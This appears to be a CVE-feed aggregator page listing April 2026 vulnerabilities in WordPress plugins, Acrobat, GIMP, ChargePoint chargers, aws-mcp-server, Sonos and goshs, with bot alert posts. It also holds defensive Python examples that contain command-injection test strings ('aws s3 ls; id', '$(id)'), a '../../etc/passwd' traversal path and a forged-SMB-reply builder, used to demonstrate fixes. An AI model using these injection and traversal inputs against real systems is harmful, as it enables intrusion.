| CVE-2026-33350 | 0 | 0.03% | 1 | 0 | | N/A | |
| CVE-2026-35169 | 0 | 0.03% | 1 | 0 | | N/A | |
| CVE-2026-35446 | 0 | 0.03% | 1 | 0 | | N/A | |
| CVE-2026-35478 | 0 | 0.07% | 1 | 0 | | N/A | |
| CVE-2026-39863 | 0 | 0.11% | 1 | 0 | | N/A | |
| CVE-2026-39860 | 0 | 0.02% | 1 | 0 | | N/A | |

CVE-2026-5809
(7.1 HIGH)

EPSS: 0.03%

updated 2026-04-11T08:16:05.503000

2 posts

The wpForo Forum plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to and including 3.0.2. This is due to a two-step logic flaw: the topic_add() and topic_edit() action handlers accept arbitrary user-supplied data[*] arrays from $_REQUEST and store them as postmeta without restricting which fields may contain array values. Because 'body' is included in the allowed topic

offseq at 2026-04-11T09:00:29.177Z ##

🛡️ CVE-2026-5809: HIGH severity vuln in wpForo Forum plugin ≤3.0.2 lets subscriber+ users delete arbitrary files (e.g., wp-config.php). No patch yet — restrict permissions & monitor topic edits for abuse. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-04-11T09:00:29.000Z ##

🛡️ CVE-2026-5809: HIGH severity vuln in wpForo Forum plugin ≤3.0.2 lets subscriber+ users delete arbitrary files (e.g., wp-config.php). No patch yet — restrict permissions & monitor topic edits for abuse. radar.offseq.com/threat/cve-20 #OffSeq #WordPress #Vuln #InfoSec

##

CVE-2026-34621
(9.6 CRITICAL)

EPSS: 0.24%

updated 2026-04-11T07:16:03.633000

4 posts

Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

offseq at 2026-04-11T11:30:30.340Z ##

🚨 CRITICAL: CVE-2026-34621 in Adobe Acrobat Reader (≤26.001.21367) enables arbitrary code execution via prototype pollution if a user opens a malicious file. No patch yet — exercise caution! radar.offseq.com/threat/cve-20

##

offseq at 2026-04-11T10:30:28.434Z ##

🚨 CRITICAL: CVE-2026-34621 in Adobe Acrobat Reader (≤26.001.21367) enables prototype pollution & arbitrary code execution via malicious files. No patch yet — avoid opening untrusted PDFs. Monitor advisories. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-04-11T11:30:30.000Z ##

🚨 CRITICAL: CVE-2026-34621 in Adobe Acrobat Reader (≤26.001.21367) enables arbitrary code execution via prototype pollution if a user opens a malicious file. No patch yet — exercise caution! radar.offseq.com/threat/cve-20 #OffSeq #Adobe #Security

##

offseq@infosec.exchange at 2026-04-11T10:30:28.000Z ##

🚨 CRITICAL: CVE-2026-34621 in Adobe Acrobat Reader (≤26.001.21367) enables prototype pollution & arbitrary code execution via malicious files. No patch yet — avoid opening untrusted PDFs. Monitor advisories. radar.offseq.com/threat/cve-20 #OffSeq #Adobe #Vuln #Infosec

##

CVE-2026-4152
(7.8 HIGH)

EPSS: 0.06%

updated 2026-04-11T03:30:41

2 posts

GIMP JP2 File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 files. The issue results f

thehackerwire@mastodon.social at 2026-04-11T04:00:10.000Z ##

🟠 CVE-2026-4152 - High (7.8)

GIMP JP2 File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerabilit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4151
(7.8 HIGH)

EPSS: 0.06%

updated 2026-04-11T03:30:41

2 posts

GIMP ANI File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ANI files. The issue results from the la

thehackerwire@mastodon.social at 2026-04-11T03:59:58.000Z ##

🟠 CVE-2026-4151 - High (7.8)

GIMP ANI File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4150
(7.8 HIGH)

EPSS: 0.06%

updated 2026-04-11T03:30:41

2 posts

GIMP PSD File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSD files. The issue results from the la

thehackerwire@mastodon.social at 2026-04-11T03:55:36.000Z ##

🟠 CVE-2026-4150 - High (7.8)

GIMP PSD File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4157
(7.5 HIGH)

EPSS: 0.19%

updated 2026-04-11T03:30:41

2 posts

ChargePoint Home Flex revssh Service Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of ChargePoint Home Flex devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of OCPP messages. The issue results from the lack of proper v

thehackerwire@mastodon.social at 2026-04-11T03:28:26.000Z ##

🟠 CVE-2026-4157 - High (7.5)

ChargePoint Home Flex revssh Service Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of ChargePoint Home Flex devices. Authentication i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4156
(7.5 HIGH)

EPSS: 0.07%

updated 2026-04-11T03:30:41

2 posts

ChargePoint Home Flex OCPP getpreq Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of ChargePoint Home Flex EV chargers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of OCPP messages. The issue results from the lack

thehackerwire@mastodon.social at 2026-04-11T03:28:16.000Z ##

🟠 CVE-2026-4156 - High (7.5)

ChargePoint Home Flex OCPP getpreq Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of ChargePoint Home Flex EV chargers. Auth...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4155
(7.5 HIGH)

EPSS: 0.24%

updated 2026-04-11T03:30:41

2 posts

ChargePoint Home Flex Inclusion of Sensitive Information in Source Code Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of ChargePoint Home Flex charging stations. Authentication is not required to exploit this vulnerability. The specific flaw exists within the genpw script. The issue results from the inc

thehackerwire@mastodon.social at 2026-04-11T03:28:07.000Z ##

🟠 CVE-2026-4155 - High (7.5)

ChargePoint Home Flex Inclusion of Sensitive Information in Source Code Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of ChargePoint Home Flex charging ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5494
(7.8 HIGH)

EPSS: 0.05%

updated 2026-04-11T03:30:41

4 posts

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within

thehackerwire@mastodon.social at 2026-04-11T03:22:50.000Z ##

🟠 CVE-2026-5494 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User intera...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-11T03:22:05.000Z ##

🟠 CVE-2026-5494 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User intera...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5059
(9.8 CRITICAL)

EPSS: 1.01%

updated 2026-04-11T03:30:41

4 posts

aws-mcp-server AWS CLI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the allowed commands list. The issue results from the lack of proper validation of a user-supplie

thehackerwire@mastodon.social at 2026-04-11T03:22:41.000Z ##

🔴 CVE-2026-5059 - Critical (9.8)

aws-mcp-server AWS CLI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerab...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-11T03:21:55.000Z ##

🔴 CVE-2026-5059 - Critical (9.8)

aws-mcp-server AWS CLI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerab...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5495
(7.8 HIGH)

EPSS: 0.05%

updated 2026-04-11T03:30:41

2 posts

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within

thehackerwire@mastodon.social at 2026-04-11T03:22:08.000Z ##

🟠 CVE-2026-5495 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User intera...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5493
(7.8 HIGH)

EPSS: 0.05%

updated 2026-04-11T03:30:41

2 posts

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within

thehackerwire@mastodon.social at 2026-04-11T03:21:59.000Z ##

🟠 CVE-2026-5493 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User intera...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5058
(9.8 CRITICAL)

EPSS: 1.01%

updated 2026-04-11T03:30:41

2 posts

aws-mcp-server Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the allowed commands list. The issue results from the lack of proper validation of a user-supplied string

thehackerwire@mastodon.social at 2026-04-11T03:02:16.000Z ##

🔴 CVE-2026-5058 - Critical (9.8)

aws-mcp-server Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerability.

...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
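
The two aws-mcp-server entries (CVE-2026-5059 and CVE-2026-5058) describe the same class of bug: a user-supplied command string is compared against an allowed-commands list, but the comparison does not properly validate the string before the command is executed. The page does not give the exact bypass, so the following is an added example, not aws-mcp-server's code, of the generic failure and one safer check. `ALLOWED`, `naive_is_allowed`, `build_argv` and `run_allowed` are constructed names: a prefix allowlist accepts `aws s3 ls; id` because it only inspects the start of the string, and if that string later reaches a shell the suffix runs too; the hardened version tokenises with `shlex`, requires an exact allowlisted service/operation pair, rejects shell metacharacters and hands an argv list to `subprocess.run` with no shell at all.

```python
"""Added example (not aws-mcp-server's code): allowlisting a CLI command
string by prefix is not a security boundary once that string reaches a
shell. The allowlist and all names below are constructed for illustration."""
import shlex
import subprocess
from typing import List

# Constructed allowlist of (service, operation) pairs an agent may run.
ALLOWED = {("s3", "ls"), ("s3", "cp"), ("sts", "get-caller-identity")}

# Characters with meaning to /bin/sh; none belongs in an aws argument.
SHELL_META = set(";|&$`<>(){}\n")


def naive_is_allowed(command: str) -> bool:
    """Vulnerable pattern: prefix match on the raw string.

    'aws s3 ls; id' and 'aws s3 lsx' both start with 'aws s3 ls', so both
    pass. If the string is then run with shell=True, ';id' executes too.
    """
    return any(command.startswith(f"aws {svc} {op}") for svc, op in ALLOWED)


def build_argv(command: str) -> List[str]:
    """Hardened check: tokenise, require an exact allowlisted (service,
    operation), reject shell metacharacters in every token, and return an
    argv list. Raises PermissionError on any failure (fail closed)."""
    try:
        argv = shlex.split(command)
    except ValueError as exc:  # unbalanced quotes
        raise PermissionError(f"unparseable command: {exc}") from None
    if len(argv) < 3 or argv[0] != "aws":
        raise PermissionError("only 'aws <service> <operation> ...' is allowed")
    if (argv[1], argv[2]) not in ALLOWED:
        raise PermissionError(f"operation not allowed: {argv[1]} {argv[2]}")
    for tok in argv:
        if SHELL_META & set(tok):
            raise PermissionError(f"shell metacharacter in argument: {tok!r}")
    return argv


def is_allowed(command: str) -> bool:
    """Boolean view of build_argv for callers that only need a verdict."""
    try:
        build_argv(command)
        return True
    except PermissionError:
        return False


def run_allowed(command: str) -> str:
    """Validate, then execute with an argv list and shell=False so the
    arguments reach the aws binary verbatim and never a shell."""
    argv = build_argv(command)
    proc = subprocess.run(argv, shell=False, capture_output=True, text=True,
                          check=False, timeout=60)
    return proc.stdout


if __name__ == "__main__":
    for cmd in ("aws s3 ls s3://bucket --profile dev",
                "aws s3 ls; id",
                "aws s3 ls $(id)",
                "aws iam create-user --user-name x"):
        print(f"{cmd!r:45} naive={naive_is_allowed(cmd)} hardened={is_allowed(cmd)}")
```

The metacharacter filter is belt-and-braces: an argv list passed without a shell is never re-interpreted, so its real purpose is to stop a later code path from joining the tokens back into a string and shelling out. The allowlist of operations is the actual control; whatever the real bypass in aws-mcp-server was, an allowlist that can be satisfied by a prefix and then evaluated by a shell cannot hold.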

CVE-2026-5144
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-11T03:30:41

2 posts

The BuddyPress Groupblog plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.9.3. This is due to the group blog settings handler accepting the `groupblog-blogid`, `default-member`, and `groupblog-silent-add` parameters from user input without proper authorization checks. The `groupblog-blogid` parameter allows any group admin (including Subscribers wh

thehackerwire@mastodon.social at 2026-04-11T03:01:57.000Z ##

🟠 CVE-2026-5144 - High (8.8)

The BuddyPress Groupblog plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.9.3. This is due to the group blog settings handler accepting the `groupblog-blogid`, `default-member`, and `groupblog-sile...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5496
(7.8 HIGH)

EPSS: 0.05%

updated 2026-04-11T01:16:18.830000

4 posts

Labcenter Electronics Proteus PDSPRJ File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the

thehackerwire@mastodon.social at 2026-04-11T03:23:00.000Z ##

🟠 CVE-2026-5496 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-11T03:22:15.000Z ##

🟠 CVE-2026-5496 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5055
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-11T01:16:18.017000

2 posts

NoMachine Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the NoMachine Device Server. The product l

thehackerwire@mastodon.social at 2026-04-11T03:02:06.000Z ##

🟠 CVE-2026-5055 - High (7.8)

NoMachine Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5054
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-11T01:16:17.890000

2 posts

NoMachine External Control of File Path Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of command line parameters. The i

thehackerwire@mastodon.social at 2026-04-11T03:55:17.000Z ##

🟠 CVE-2026-5054 - High (7.8)

NoMachine External Control of File Path Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low-pri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4154
(7.8 HIGH)

EPSS: 0.06%

updated 2026-04-11T01:16:17.093000

2 posts

GIMP XPM File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XPM files. The issue results from the la

thehackerwire@mastodon.social at 2026-04-11T03:22:20.000Z ##

🟠 CVE-2026-4154 - High (7.8)

GIMP XPM File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4153
(7.8 HIGH)

EPSS: 0.06%

updated 2026-04-11T01:16:16.963000

2 posts

GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSP files. The issue results f

thehackerwire@mastodon.social at 2026-04-11T04:00:25.000Z ##

🟠 CVE-2026-4153 - High (7.8)

GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerabilit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4149
(10.0 CRITICAL)

EPSS: 1.27%

updated 2026-04-11T01:16:16.430000

6 posts

Sonos Era 300 SMB Response Out-Of-Bounds Access Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sonos Era 300. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the DataOffset field within SMB responses. The issue results from the lack of proper valida

offseq at 2026-04-11T13:00:26.648Z ##

⚠️ CVE-2026-4149: Sonos Era 300 (v17.5) has a CRITICAL remote code execution vulnerability via SMB, allowing kernel-level compromise without auth. No patch yet — restrict SMB access! radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-04-11T03:55:26.000Z ##

🔴 CVE-2026-4149 - Critical (10)

Sonos Era 300 SMB Response Out-Of-Bounds Access Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sonos Era 300. Authentication is not required to exploit this vu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq at 2026-04-11T01:30:29.280Z ##

🚨 CRITICAL: CVE-2026-4149 in Sonos Era 300 (v17.5) allows unauth RCE via SMB out-of-bounds flaw (CVSS 10.0). No patch yet — restrict SMB access, monitor advisories. radar.offseq.com/threat/cve-20

##
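
The Sonos entry above names the unchecked field (DataOffset in an SMB response) but gives no parser detail. The Era 300 is the SMB client in this scenario (it mounts network shares for music libraries), so the untrusted party is the server answering it. The following is an added example, not Sonos firmware, of the two checks a client-side parser needs on an SMB2 READ response before copying data out of it: DataOffset must point past the 64-byte SMB2 header and the 16-byte fixed part of the response, and DataOffset + DataLength must not exceed the bytes actually received. The field layout follows the SMB2 READ Response structure in [MS-SMB2]; the helper names are mine and the sample messages are constructed inline.

```python
"""Added example (not Sonos code): bounds-checking DataOffset/DataLength in an
SMB2 READ response. In a C client the unchecked version is an out-of-bounds
read; in Python slicing is memory-safe, so it silently returns wrong bytes."""
import struct
from typing import Optional

SMB2_MAGIC = b"\xfeSMB"
SMB2_HEADER_LEN = 64           # fixed SMB2 packet header
SMB2_READ = 0x0008
READ_RESP_STRUCT_SIZE = 17     # StructureSize value for a READ response
READ_RESP_FIXED = 16           # bytes before the variable Buffer field
# StructureSize(2) DataOffset(1) Reserved(1) DataLength(4) DataRemaining(4) Reserved2(4)
READ_RESP_FMT = "<HBBIII"


def build_read_response(data: bytes, data_offset: Optional[int] = None,
                        data_length: Optional[int] = None) -> bytes:
    """Construct a minimal SMB2 READ response (constructed test input).
    data_offset / data_length default to honest values; pass other values
    to forge the kind of reply a malicious server would send."""
    header = bytearray(SMB2_HEADER_LEN)
    header[0:4] = SMB2_MAGIC
    struct.pack_into("<H", header, 4, SMB2_HEADER_LEN)   # StructureSize
    struct.pack_into("<H", header, 12, SMB2_READ)         # Command
    struct.pack_into("<I", header, 16, 1)                 # Flags: SERVER_TO_REDIR
    off = SMB2_HEADER_LEN + READ_RESP_FIXED if data_offset is None else data_offset
    length = len(data) if data_length is None else data_length
    body = struct.pack(READ_RESP_FMT, READ_RESP_STRUCT_SIZE, off, 0, length, 0, 0)
    return bytes(header) + body + data


def unchecked_read_data(msg: bytes) -> bytes:
    """Vulnerable pattern: trust DataOffset and DataLength from the wire."""
    _, off, _, length, _, _ = struct.unpack_from(READ_RESP_FMT, msg, SMB2_HEADER_LEN)
    return msg[off:off + length]     # memcpy(dst, msg + off, length) in C


def checked_read_data(msg: bytes) -> bytes:
    """Hardened: validate every offset and length against len(msg) first."""
    if len(msg) < SMB2_HEADER_LEN + READ_RESP_FIXED:
        raise ValueError("message shorter than header + fixed response")
    if msg[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    (command,) = struct.unpack_from("<H", msg, 12)
    if command != SMB2_READ:
        raise ValueError(f"unexpected command {command:#x}")
    ssize, off, _, length, _, _ = struct.unpack_from(READ_RESP_FMT, msg, SMB2_HEADER_LEN)
    if ssize != READ_RESP_STRUCT_SIZE:
        raise ValueError(f"bad StructureSize {ssize}")
    if off < SMB2_HEADER_LEN + READ_RESP_FIXED:
        raise ValueError(f"DataOffset {off} points inside the header")
    if off + length > len(msg):      # the upper-bound check that must not be missing
        raise ValueError(f"DataOffset+DataLength ({off + length}) exceeds message ({len(msg)})")
    return msg[off:off + length]


if __name__ == "__main__":
    honest = build_read_response(b"hello world")
    forged = build_read_response(b"hello", data_length=0x1000)
    print(checked_read_data(honest))
    print(unchecked_read_data(forged))   # returns short data; a C client would read past the buffer
```

DataOffset is a single byte, so the interesting forgery from a server is a DataLength far larger than the message; the lower-bound check matters too, because an offset pointing back into the header lets the parser copy header bytes as if they were file data. An SMB client on an embedded device should apply the same discipline to every offset/length pair in every response, not only to READ.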

CVE-2026-40188
(7.7 HIGH)

EPSS: 0.03%

updated 2026-04-10T21:37:28

2 posts

### Summary The SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. ### Details Here is the issue: ```go // helper.go:155-215 func cmdFile(root string, r *sftp.Request, ip string, sftpServer *SFTPServer) error { fullPath, err := sanitizePath(r.Filepath, root) // Source: SANITIZED if err != nil

thehackerwire@mastodon.social at 2026-04-11T04:01:16.000Z ##

🟠 CVE-2026-40188 - High (7.7)

goshs is a SimpleHTTPServer written in Go. From 1.0.7 to before 2.0.0-beta.4, the SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. This vulnerability ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
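
The goshs SFTP description above is cut off mid-snippet, but the bug is fully stated: `rename` sanitizes the source path and not the destination, so an authenticated SFTP client can move a file to a path outside the served root. The following is an added example, not goshs's code, of the same mistake and its fix in Python. `sanitize_path` here is a hypothetical stand-in for the Go helper the description names, not a port of it; `rename_vulnerable` runs only the source through it, `rename_fixed` runs both.

```python
"""Added example (not goshs code): every client-supplied path in a two-path
operation must go through the same root confinement."""
import posixpath
from typing import Tuple


class PathEscapesRoot(PermissionError):
    pass


def sanitize_path(client_path: str, root: str) -> str:
    """Confine a client-supplied SFTP path to root.

    The path is first normalised against a virtual '/', which collapses any
    number of leading '..' segments, then joined under root. The final
    commonpath check is belt-and-braces in case root itself is unusual.
    """
    root = posixpath.normpath(root)
    virtual = posixpath.normpath(posixpath.join("/", client_path))
    full = posixpath.normpath(posixpath.join(root, virtual.lstrip("/")))
    if posixpath.commonpath([root, full]) != root:
        raise PathEscapesRoot(client_path)
    return full


def rename_vulnerable(root: str, src: str, dst: str) -> Tuple[str, str]:
    """Mirrors the reported bug: only the source is confined. The destination
    is joined and normalised the way the kernel would resolve it, so '..'
    segments (or an absolute path) climb out of root."""
    safe_src = sanitize_path(src, root)
    raw_dst = posixpath.normpath(posixpath.join(root, dst))
    return safe_src, raw_dst


def rename_fixed(root: str, src: str, dst: str) -> Tuple[str, str]:
    """Both ends of the rename go through the same confinement."""
    return sanitize_path(src, root), sanitize_path(dst, root)


def is_under(root: str, path: str) -> bool:
    """True if path lies under root after lexical normalisation."""
    root = posixpath.normpath(root)
    return posixpath.commonpath([root, posixpath.normpath(path)]) == root


if __name__ == "__main__":
    print(rename_vulnerable("/srv/sftp", "notes.txt", "../../etc/passwd"))
    print(rename_fixed("/srv/sftp", "notes.txt", "../../etc/passwd"))
```

`posixpath` does string work only. A symlink already inside the root that points outside it is not caught by this check; on a real filesystem, resolve the confined path with `os.path.realpath` and re-check it against the root, or operate relative to a directory file descriptor of the root where the platform supports it. The same rule applies to every SFTP operation that takes two paths, including symlink creation.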

CVE-2026-5483
(8.6 HIGH)

EPSS: 0.06%

updated 2026-04-10T21:31:15

2 posts

A flaw was found in odh-dashboard in Red Hat Openshift AI. This vulnerability in the `odh-dashboard` component of Red Hat OpenShift AI (RHOAI) allows for the disclosure of Kubernetes Service Account tokens through a NodeJS endpoint. This could enable an attacker to gain unauthorized access to Kubernetes resources.

thehackerwire@mastodon.social at 2026-04-11T05:00:38.000Z ##

🟠 CVE-2026-5483 - High (8.5)

A flaw was found in odh-dashboard in Red Hat Openshift AI. This vulnerability in the `odh-dashboard` component of Red Hat OpenShift AI (RHOAI) allows for the disclosure of Kubernetes Service Account tokens through a NodeJS endpoint. This could ena...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6057
(9.8 CRITICAL)

EPSS: 0.13%

updated 2026-04-10T21:16:28.800000

1 posts

FalkorDB Browser 1.9.3 contains an unauthenticated path traversal vulnerability in the file upload API that allows remote attackers to write arbitrary files and achieve remote code execution.

offseq@infosec.exchange at 2026-04-10T10:30:30.000Z ##

CVE-2026-6057: CRITICAL path traversal in FalkorDB Browser 1.9.3 (file upload API). Unauthenticated attackers can write arbitrary files, risking RCE. No patch yet — restrict access and monitor logs. radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #FalkorDB #InfoSec

##

CVE-2026-40189
(0 None)

EPSS: 0.10%

updated 2026-04-10T20:16:23.890000

4 posts

goshs is a SimpleHTTPServer written in Go. Prior to 2.0.0-beta.4, goshs enforces the documented per-folder .goshs ACL/basic-auth mechanism for directory listings and file reads, but it does not enforce the same authorization checks for state-changing routes. An unauthenticated attacker can upload files with PUT, upload files with multipart POST /upload, create directories with ?mkdir, and delete f

offseq at 2026-04-11T14:30:12.404Z ##

